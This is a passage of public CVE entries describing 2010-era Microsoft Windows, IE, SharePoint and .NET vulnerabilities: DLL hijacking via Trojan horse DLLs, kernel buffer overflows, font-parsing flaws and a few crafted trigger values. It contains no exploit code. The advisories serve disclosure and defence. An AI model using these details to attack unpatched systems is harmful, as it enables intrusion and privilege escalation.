2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652. [CVE-2010-4398] Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges, and bypass the User Account Control (UAC) feature, via a crafted REG_BINARY value for a SystemDefaultEUDCFont registry key, aka "Driver Improper Interaction with Windows Kernel Vulnerability." [CVE-2010-4182] Untrusted search path vulnerability in the Data Access Objects (DAO) library (dao360.dll) in Microsoft Windows XP Professional SP3, Windows Server 2003 R2 Enterprise Edition SP3, Windows Vista Business SP1, and Windows 7 Professional allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse msjet49.dll that is located in the same folder as a file that is processed by dao360.dll. NOTE: the provenance of this information is unknown [CVE-2010-3974] fxscover.exe in the Fax Cover Page Editor in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse FAX cover pages, which allows remote attackers to execute arbitrary code via a crafted .cov file, aka "Fax Cover Page Editor Memory Corruption Vulnerability." [CVE-2010-3973] The WMITools ActiveX control in WBEMSingleView.ocx 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted argument to the AddContextRef method, possibly an untrusted pointer dereference, aka "Microsoft WMITools ActiveX Control Vulnerability." [CVE-2010-3970] Stack-based buffer overflow in the CreateSizedDIBSECTION function in shimgvw.dll in the Windows Shell graphics processor (aka graphics rendering engine) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted .MIC or unspecified Office document containing a thumbnail bitmap with a negative biClrUsed value, as reported by Moti and Xu Hao, aka "Windows Shell Graphics Processing Overrun Vulnerability." [CVE-2010-3967] Untrusted search path vulnerability in Microsoft Windows Movie Maker (WMM) 2.6 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Movie Maker (MSWMM) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3966] Untrusted search path vulnerability in Microsoft Windows Server 2008 R2 and Windows 7, when BranchCache is supported, allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an EML file, an RSS file, or a WPOST file, aka "BranchCache Insecure Library Loading Vulnerability." [CVE-2010-3965] Untrusted search path vulnerability in Windows Media Encoder 9 on Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Windows Media Profile (PRX) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3963] Buffer overflow in the Routing and Remote Access NDProxy component in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, related to the Routing and Remote Access service (RRAS) and improper copying from user mode to the kernel, aka "Kernel NDProxy Buffer Overflow Vulnerability." [CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability." [CVE-2010-3960] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, and R2 allows guest OS users to cause a denial of service (host OS hang) by sending a crafted encapsulated packet over the VMBus, aka "Hyper-V VMBus Vulnerability." [CVE-2010-3959] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted CMAP table in an OpenType font, aka "OpenType CMAP Table Vulnerability." [CVE-2010-3957] Double free vulnerability in the OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Double Free Vulnerability." [CVE-2010-3956] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly perform array indexing, which allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Index Vulnerability." [CVE-2010-3944] win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2010-3943] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly link driver objects, which allows local users to gain privileges via a crafted application that triggers linked-list corruption, aka "Win32k Cursor Linking Vulnerability." [CVE-2010-3942] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for copies from user mode, which allows local users to gain privileges via a crafted application, aka "Win32k WriteAV Vulnerability." [CVE-2010-3941] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k Double Free Vulnerability." [CVE-2010-3940] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k PFE Pointer Double Free Vulnerability." [CVE-2010-3939] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via vectors related to improper memory allocation for copies from user mode, aka "Win32k Buffer Overflow Vulnerability." [CVE-2010-3889] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Microsoft researchers and other researchers. [CVE-2010-3888] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Kaspersky Lab researchers and other researchers. [CVE-2010-3338] The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888. [CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization Vulnerability," a different vulnerability than CVE-2010-1257. [CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability." [CVE-2010-3229] The Secure Channel (aka SChannel) security package in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when IIS 7.x is used, does not properly process client certificates during SSL and TLS handshakes, which allows remote attackers to cause a denial of service (LSASS outage and reboot) via a crafted packet, aka "TLSv1 Denial of Service Vulnerability." [CVE-2010-3227] Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka "Windows MFC Document Title Updating Buffer Overflow Vulnerability." [CVE-2010-3225] Use-after-free vulnerability in the Media Player Network Sharing Service in Microsoft Windows Vista SP1 and SP2 and Windows 7 allows remote attackers to execute arbitrary code via a crafted Real Time Streaming Protocol (RTSP) packet, aka "RTSP Use After Free Vulnerability." [CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability." [CVE-2010-3222] Stack-based buffer overflow in the Remote Procedure Call Subsystem (RPCSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted LPC message that requests an LRPC connection from an LPC server to a client, aka "LPC Message Buffer Overrun Vulnerability." [CVE-2010-3147] Untrusted search path vulnerability in wab.exe 6.00.2900.5512 in Windows Address Book in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a Trojan horse wab32res.dll file in the current working directory, as demonstrated by a directory that contains a Windows Address Book (WAB), VCF (aka vCard), or P7C file, aka "Insecure Library Loading Vulnerability." NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3143. [CVE-2010-3145] Untrusted search path vulnerability in the BitLocker Drive Encryption API, as used in sdclt.exe in Backup Manager in Microsoft Windows Vista SP1 and SP2, allows local users to gain privileges via a Trojan horse fveapi.dll file in the current working directory, as demonstrated by a directory that contains a Windows Backup Catalog (.wbcat) file, aka "Backup Manager Insecure Library Loading Vulnerability." [CVE-2010-3144] Untrusted search path vulnerability in the Internet Connection Signup Wizard in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse smmscrpt.dll file in the current working directory, as demonstrated by a directory that contains an ISP or INS file, aka "Internet Connection Signup Wizard Insecure Library Loading Vulnerability." [CVE-2010-3143] Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147. [CVE-2010-3140] Untrusted search path vulnerability in Microsoft Windows Internet Communication Settings on Windows XP SP3 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse schannel.dll that is located in the same folder as an ISP file. [CVE-2010-3139] Untrusted search path vulnerability in Microsoft Windows Progman Group Converter (grpconv.exe) allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse imm.dll that is located in the same folder as a .grp file. [CVE-2010-3138] Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse iacenc.dll file in the current working directory, as demonstrated by access through BS.Player or Media Player Classic to a directory that contains a .avi, .mka, .ra, or .ram file, aka "Indeo Codec Insecure Library Loading Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-2746] Heap-based buffer overflow in Comctl32.dll (aka the common control library) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when a third-party SVG viewer is used, allows remote attackers to execute arbitrary code via a crafted HTML document that triggers unspecified messages from this viewer, aka "Comctl32 Heap Overflow Vulnerability." [CVE-2010-2745] Microsoft Windows Media Player (WMP) 9 through 12 does not properly deallocate objects during a browser reload action, which allows user-assisted remote attackers to execute arbitrary code via crafted media content referenced in an HTML document, aka "Windows Media Player Memory Corruption Vulnerability." [CVE-2010-2744] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly manage a window class, which allows local users to gain privileges by creating a window, then using (1) the SetWindowLongPtr function to modify the popup menu structure, or (2) the SwitchWndProc function with a switch window information pointer, which is not re-initialized when a WM_NCCREATE message is processed, aka "Win32k Window Class Vulnerability." [CVE-2010-2743] The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889. [CVE-2010-2742] The Netlogon RPC Service in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, and R2, when the domain controller role is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted RPC packet, aka "Netlogon RPC Null dereference DOS Vulnerability." [CVE-2010-2741] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 performs an incorrect integer calculation during font processing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Validation Vulnerability." [CVE-2010-2740] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly perform memory allocation during font parsing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Parsing Vulnerability." [CVE-2010-2739] Buffer overflow in the CreateDIBPalette function in win32k.sys in Microsoft Windows XP SP3, Server 2003 R2 Enterprise SP2, Vista Business SP1, Windows 7, and Server 2008 SP2 allows local users to cause a denial of service (crash) and possibly execute arbitrary code by performing a clipboard operation (GetClipboardData API function) with a crafted bitmap with a palette that contains a large number of colors. [CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability." [CVE-2010-2731] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 on Windows XP SP3, when directory-based Basic Authentication is enabled, allows remote attackers to bypass intended access restrictions and execute ASP files via a crafted request, aka "Directory Authentication Bypass Vulnerability." [CVE-2010-2729] The Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when printer sharing is enabled, does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2010, aka "Print Spooler Service Impersonation Vulnerability." [CVE-2010-2568] Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems. [CVE-2010-2567] The RPC client implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly allocate memory during the parsing of responses, which allows remote RPC servers and man-in-the-middle attackers to execute arbitrary code via a malformed response, aka "RPC Memory Corruption Vulnerability." [CVE-2010-2566] The Secure Channel (aka SChannel) security package in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, does not properly validate certificate request messages from TLS and SSL servers, which allows remote servers to execute arbitrary code via a crafted SSL response, aka "SChannel Malformed Certificate Request Remote Code Execution Vulnerability." [CVE-2010-2564] Buffer overflow in Microsoft Windows Movie Maker (WMM) 2.1, 2.6, and 6.0 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted project file, aka "Movie Maker Memory Corruption Vulnerability." [CVE-2010-2563] The Word 97 text converter in the WordPad Text Converters in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse malformed structures in Word 97 documents, which allows remote attackers to execute arbitrary code via a crafted document containing an unspecified value that is used in a loop counter, aka "WordPad Word 97 Text Converter Memory Corruption Vulnerability." [CVE-2010-2555] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the length of strings in the registry, which allows local users to gain privileges or cause a denial of service (memory corruption) via vectors involving a long string, aka "Tracing Memory Corruption Vulnerability." [CVE-2010-2554] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka "Tracing Registry Key ACL Vulnerability." [CVE-2010-2553] The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability." [CVE-2010-2552] Stack consumption vulnerability in the SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (system hang) via a malformed SMBv2 compounded request, aka "SMB Stack Exhaustion Vulnerability." [CVE-2010-2551] The SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate an internal variable in an SMB packet, which allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 packet, aka "SMB Variable Validation Vulnerability." [CVE-2010-2550] The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability." [CVE-2010-2549] Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability." [CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction. [CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value. [CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability." [CVE-2010-1897] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate pseudo-handle values in callback parameters during window creation, which allows local users to gain privileges via a crafted application, aka "Win32k Window Creation Vulnerability." [CVE-2010-1896] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 do not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k User Input Validation Vulnerability." [CVE-2010-1895] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly perform memory allocation before copying user-mode data to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k Pool Overflow Vulnerability." [CVE-2010-1894] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling Vulnerability." [CVE-2010-1893] Integer overflow in the TCP/IP stack in Microsoft Windows Vista SP1, Windows Server 2008 Gold and R2, and Windows 7 allows local users to gain privileges via a buffer of user-mode data that is copied to kernel mode, aka "Integer Overflow in Windows Networking Vulnerability." [CVE-2010-1892] The TCP/IP stack in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle malformed IPv6 packets, which allows remote attackers to cause a denial of service (system hang) via multiple crafted packets, aka "IPv6 Memory Corruption Vulnerability." [CVE-2010-1891] The Client/Server Runtime Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2, when a Chinese, Japanese, or Korean locale is enabled, does not properly allocate memory for transactions, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Elevation of Privilege Vulnerability." [CVE-2010-1890] The kernel in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate ACLs on kernel objects, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Improper Validation Vulnerability." [CVE-2010-1889] Double free vulnerability in the kernel in Microsoft Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2, allows local users to gain privileges via a crafted application, related to object initialization during error handling, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-1888] Race condition in the kernel in Microsoft Windows XP SP3 allows local users to gain privileges via vectors involving thread creation, aka "Windows Kernel Data Initialization Vulnerability." [CVE-2010-1887] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument, which allows local users to cause a denial of service (system hang) via a crafted application, aka "Win32k Bounds Checking Vulnerability." [CVE-2010-1886] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 SP2 and R2, and Windows 7 allow local users to gain privileges by leveraging access to a process with NetworkService credentials, as demonstrated by TAPI Server, SQL Server, and IIS processes, and related to the Windows Service Isolation feature. NOTE: the vendor states that privilege escalation from NetworkService to LocalSystem does not cross a "security boundary." [CVE-2010-1885] The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability." [CVE-2010-1883] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted table in an embedded font, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2010-1882] Multiple buffer overflows in the MPEG Layer-3 Audio Codec for Microsoft DirectShow in l3codecx.ax in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote attackers to execute arbitrary code via an MPEG Layer-3 audio stream in (1) a crafted media file or (2) crafted streaming content, aka "MPEG Layer-3 Audio Decoder Buffer Overflow Vulnerability." [CVE-2010-1880] Unspecified vulnerability in Quartz.dll for DirectShow on Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1, and Server 2008 allows remote attackers to execute arbitrary code via a media file with crafted compression data, aka "MJPEG Media Decompression Vulnerability." [CVE-2010-1735] The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1734] The SfnINSTRING function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x18d value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1690] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 does not verify that transaction IDs of responses match transaction IDs of queries, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1689] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 uses predictable transaction IDs that are formed by incrementing a previous ID by 1, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1264] Unspecified vulnerability in Microsoft Windows SharePoint Services 3.0 SP1 and SP2 allows remote attackers to cause a denial of service (hang) via crafted requests to the Help page that cause repeated restarts of the application pool, aka "Sharepoint Help Page Denial of Service Vulnerability." [CVE-2010-1263] Windows Shell and WordPad in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 [CVE-2010-1255] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 allows local users to execute arbitrary code via vectors related to "glyph outline information" and TrueType fonts, aka "Win32k TrueType Font Parsing Vulnerability." [CVE-2010-1225] The memory-management implementation in the Virtual Machine Monitor (aka VMM or hypervisor) in Microsoft Virtual PC 2007 Gold and SP1, Virtual Server 2005 Gold and R2 SP1, and Windows Virtual PC does not properly restrict access from the guest OS to memory locations in the VMM work area, which allows context-dependent attackers to bypass certain anti-exploitation protection mechanisms on the guest OS via crafted input to a vulnerable application. NOTE: the vendor reportedly found that only systems with an otherwise vulnerable application are affected, because "the memory areas accessible from the guest cannot be leveraged to achieve either remote code execution or elevation of privilege and ... no data from the host is exposed to the guest OS." [CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability." [CVE-2010-1118] Unspecified vulnerability in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a use-after-free issue, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1117] Heap-based buffer overflow in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to discover the base address of a Windows .dll file, and possibly have unspecified other impact, via unknown vectors, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1098] The ANI parser in Microsoft Windows before 7 on the x86 platform, as used in Internet Explorer and other applications, allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted biClrUsed value in the BITMAPINFO header of a .ANI file. [CVE-2010-1042] Microsoft Windows Media Player 11 does not properly perform colorspace conversion, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .AVI file. NOTE: the provenance of this information is unknown [CVE-2010-0917] Stack-based buffer overflow in VBScript in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, might allow user-assisted remote attackers to execute arbitrary code via a long string in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution when the F1 key is pressed, a different vulnerability than CVE-2010-0483. [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2010-0819] Unspecified vulnerability in the Windows OpenType Compact Font Format (CFF) driver in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users to execute arbitrary code via unknown vectors related to improper validation when copying data from user mode to kernel mode, aka "OpenType CFF Font Driver Memory Corruption Vulnerability." [CVE-2010-0818] The MPEG-4 codec in the Windows Media codecs in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly handle crafted media content with MPEG-4 video encoding, which allows remote attackers to execute arbitrary code via a file in an unspecified "supported format," aka "MPEG-4 